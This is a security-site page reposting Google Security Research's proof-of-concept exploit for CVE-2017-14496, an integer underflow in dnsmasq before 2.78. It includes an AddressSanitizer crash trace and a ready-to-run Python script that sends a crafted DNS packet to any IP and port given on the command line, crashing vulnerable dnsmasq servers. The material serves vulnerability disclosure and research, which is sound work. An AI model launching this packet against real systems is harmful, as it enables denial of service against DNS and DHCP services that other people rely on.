首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Dnsmasq < 2.78 - Integer Underflow
来源:Google Security Research 作者:Google 发布时间:2017-10-10  
'''
Sources:
https://raw.githubusercontent.com/google/security-research-pocs/master/vulnerabilities/dnsmasq/CVE-2017-14496.py
https://security.googleblog.com/2017/10/behind-masq-yet-more-dns-and-dhcp.html
 
dnsmasq is vulnerable only if one of the following option is specified: --add-mac, --add-cpe-id or --add-subnet.
 
=================================================================
==2215==ERROR: AddressSanitizer: negative-size-param: (size=-4)
    #0 0x4b55be in __asan_memcpy (/test/dnsmasq/src/dnsmasq+0x4b55be)
    #1 0x59a70e in add_pseudoheader /test/dnsmasq/src/edns0.c:164:8
    #2 0x59bae8 in add_edns0_config /test/dnsmasq/src/edns0.c:424:12
    #3 0x530b6b in forward_query /test/dnsmasq/src/forward.c:407:20
    #4 0x534699 in receive_query /test/dnsmasq/src/forward.c:1448:16
    #5 0x548486 in check_dns_listeners /test/dnsmasq/src/dnsmasq.c:1565:2
    #6 0x5448b6 in main /test/dnsmasq/src/dnsmasq.c:1044:7
    #7 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
    #8 0x41cbe9 in _start (/test/dnsmasq/src/dnsmasq+0x41cbe9)
 
0x62200001ca2e is located 302 bytes inside of 5131-byte region [0x62200001c900,0x62200001dd0b)
allocated by thread T0 here:
    #0 0x4cc700 in calloc (/test/dnsmasq/src/dnsmasq+0x4cc700)
    #1 0x5181b5 in safe_malloc /test/dnsmasq/src/util.c:267:15
    #2 0x54186c in main /test/dnsmasq/src/dnsmasq.c:99:20
    #3 0x7fb05e3cf2b0 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x202b0)
 
SUMMARY: AddressSanitizer: negative-size-param (/test/dnsmasq/src/dnsmasq+0x4b55be) in __asan_memcpy
==2215==ABORTING
'''
 
#!/usr/bin/python
#
# Copyright 2017 Google Inc
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Authors:
#  Fermin J. Serna <fjserna@google.com>
#  Felix Wilhelm <fwilhelm@google.com>
#  Gabriel Campana <gbrl@google.com>
#  Kevin Hamacher <hamacher@google.com>
#  Gynvael Coldwin <gynvael@google.com>
#  Ron Bowes - Xoogler :/
 
import socket
import sys
 
def negative_size_param():
  data = '''00 00 00 00  00 00 00 00 00 00 00 04
00 00 29 00 00 3a 00 00  00 01 13 fe 32 01 13 79
00 00 00 00 00 00 00 01  00 00 00 61 00 08 08 08
08 08 08 08 08 08 08 08  08 08 08 00 00 00 00 00
00 00 00 6f 29 fb ff ff  ff 00 00 00 00 00 00 00
00 00 03 00 00 00 00 00  00 00 00 02 8d 00 00 00
f9 00 00 00 00 00 00 00  00 00 00 00 5c 00 00 00
01 ff ff 00 35 13 01 0d  06 1b 00 00 00 00 00 00
00 00 00 00 00 04 00 00  29 00 00 3a 00 00 00 01
13 00 08 01 00 00 00 00  00 00 01 00 00 00 61 00
08 08 08 08 08 08 08 08  08 13 08 08 08 00 00 00
00 00 00 00 00 00 6f 29  fb ff ff ff 00 29 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 02 8d 00 00 00 f9  00 00 00 00 00 00 00 00
00 00 00 00 00 01 00 00  00 00 00 00 01 ff ff 00
35 13 00 00 00 00 00 b6  00 00 13 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00  00 00 00 00 00 00 61 05
01 20 00 01
'''.replace(' ', '').replace('\n', '').decode('hex')
  return data
 
if __name__ == '__main__':
  if len(sys.argv) != 3:
    print 'Usage: %s <ip> <port>' % sys.argv[0]
    sys.exit(0)
 
  ip = sys.argv[1]
  port = int(sys.argv[2])
 
  packet = negative_size_param()
 
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.setsockopt(socket.SOL_SOCKET,socket.SO_BROADCAST, 1)
  s.sendto(packet, (ip, port))
  s.close()
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Dnsmasq < 2.78 - Lack of free(
·DiskBoss Enterprise 8.4.16 - L
·Dnsmasq < 2.78 - Information L
·Dnsmasq < 2.78 - Stack-Based O
·Dnsmasq < 2.78 - Heap-Based Ov
·Dnsmasq < 2.78 - 2-byte Heap-B
·Qmail SMTP - Bash Environment
·Linux Kernel < 4.14.rc3 - Loca
·Microsoft Word 2007 (x86) - In
·Sync Breeze Enterprise 10.0.28
·FileRun < 2017.09.18 - SQL Inj
·Dup Scout Enterprise 10.0.18 -
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved